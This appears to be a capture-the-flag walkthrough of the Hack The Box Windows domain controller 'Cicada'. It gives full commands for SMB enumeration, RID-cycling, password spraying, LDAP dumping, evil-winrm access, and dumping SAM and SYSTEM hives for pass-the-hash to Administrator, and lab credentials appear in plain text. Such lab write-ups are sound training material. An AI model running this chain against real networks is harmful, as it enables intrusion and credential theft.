Cicada
Enumeration
nmap -v -A -O -p- -T4 -Pn -sC permx.htb -oN nmapNmap scan report for cicada.htb (10.10.11.35)
Host is up (0.049s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-11 22:22:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
60294/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.025 days (since Wed Dec 11 09:47:57 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-11T22:23:14
|_ start_date: N/A
|_clock-skew: 6h59m57s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 48.32 ms 10.10.14.1
2 48.88 ms cicada.htb (10.10.11.35)
Port 445 - SMB
Connecting to a SMB share using anonymous user we will find 2 interesting shares:
smbclient -U '' -L \\\\<IP> 
Share DEV unfortunately is not readable, but we see that HR and IPC$ are readable:
sudo crackmapexec smb 10.10.11.35 -u 'guest' -p '' --shares
so we can try to RID Cycling attack the SMB protocol using "guest" account:
crackmapexec smb cicada.htb -u guest -p "" --rid-brute
And we will obtain users valid list:
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscarsFoothold (michael.wrightson)
We can try to access the readable HR share using "guest" account:
And we will finally obtain a foothold, a valid password for new hire user:
Cicada$M6Corpb*@Lp#nZp!8
Let's see if there are any new employees among those drawn through RID Cycling attack using a Spray Password attack against SMB share with CrackMapExec:
crackmapexec smb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success cicada.htb
cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Privilege Escalation (david.orelious)
With these pair vaild credentials we can enumerate more infos about domain using LDAP protocol:
ldapdomaindump -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' ldap://cicada.htb
cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
Privilege Escalation (emily.oscars)
The DEV share is accessible and readable by david.orelious user. Inside it we will find a Backup_script.ps1 Powershell script containing another pair of credentials:
cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*VtTrying to connect using Win-RM we will obtain a shell on Domain Controller and get the user flag:
evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Privilege Escalation (Administrator)
Inside Documents directory there is a Powershell Script:
When we run the whoami /priv command we see that the Emily user has SeBackupPrivileges that we can use to escalate privileges.
This privilege allows the user to read all the files in the system, we will use this to our advantage. We can use this to copy the SAM and SYSTEM file from Windows using the commands:
reg save hklm\sam c:\Temp\samreg save hklm\system c:\Temp\system
then send this to our attack device using the Evil-WinRM download command, we transfer the file from the Temp directory on the target machine to our Kali Linux Machine:
and use secretsdump or pypykatz to extract the hive secrets from the SAM and SYSTEM file.
pypykatz registry --sam sam system
Finally use evil-winrm with Hash parameter of Administrator to login on DC and obtain root flag 🎉
Last updated